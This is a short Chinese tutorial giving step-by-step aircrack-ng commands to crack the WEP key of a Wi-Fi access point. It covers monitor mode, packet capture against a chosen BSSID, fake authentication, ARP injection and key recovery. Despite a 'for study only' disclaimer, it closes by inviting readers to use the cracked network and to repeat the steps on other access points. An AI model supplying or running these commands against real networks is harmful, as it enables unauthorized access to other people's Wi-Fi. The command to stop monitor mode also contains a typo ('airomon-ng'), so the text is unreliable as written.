Ubuntu使用aircrack-ng
本文仅供学习研究,请勿用于非法用途
一、启动无线网卡的监控模式
在终端中输入以下命令:
sudo airmon-ng start wlan0(这里的 wlan0 是无线网卡的端口,你可以在终端中输入 ifconfig 命令来查看自己的无线网卡端口。)
二、查看无线接入点(AP)
在终端中输入:
sudo airodump-ng mon0(特别说明:启动监控模式后,无线网的端口变为 mon0。)
通过此命令可以查看哪些采用 WEP 加密的无线接入点(AP)在线,查看完成后,按 Ctrl+C 退出,并保留该终端。
三、抓包
打开另一个终端,输入以下命令:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0(解释:-c 后面的 6 是要破解的 AP 的工作频道;--bssid 后面的 AP's MAC 是欲破解的 AP 的 MAC 地址;-w 后面的 wep 是抓下来的数据包 DATA 保存的文件名。具体的频道和 MAC 地址需要根据步骤二中查看到的在线 AP 进行更改,DATA 保存的文件名可自行随意命名。)
四、与 AP 建立虚拟连接
再打开一个新的终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0(解释:-h 后面的 My MAC 是自己的无线网卡的 MAC 地址,你可以使用命令 iwlist wlan0 scanning 查看自己的 MAC 地址。)
五、进行注入
成功建立虚拟连接后,输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0这时,可以回头查看步骤三中的终端,看看 DATA 是否开始大量增加。
六、解密
在收集到 5000 个以上的 DATA 之后,打开另一个终端,输入:
sudo aircrack-ng wep*.cap进行解密操作。
(如果没有计算出密码,请继续等待,aircrack-ng 会在 DATA 每增加 5000 个之后自动重新运行,直到计算出密码为止。)
七、收工
成功破解出密码后,在终端中输入 sudo airomon-ng stop mon0 关闭监控模式,因为如果不这样做,无线网卡会一直向刚刚的 AP 进行注入操作,使用 Ctrl+C 退出或直接关闭终端都无法停止。现在,你可以上网冲浪啦,或者重复步骤 1 至 7 破解其他的 AP。不过,兄弟们在上网冲浪时可别太猛了,不然给网络的主人带来麻烦就不好啦。
「倘若有所帮助,不妨酌情赞赏!」
感谢您的支持!
使用微信扫描二维码赞赏
正好需要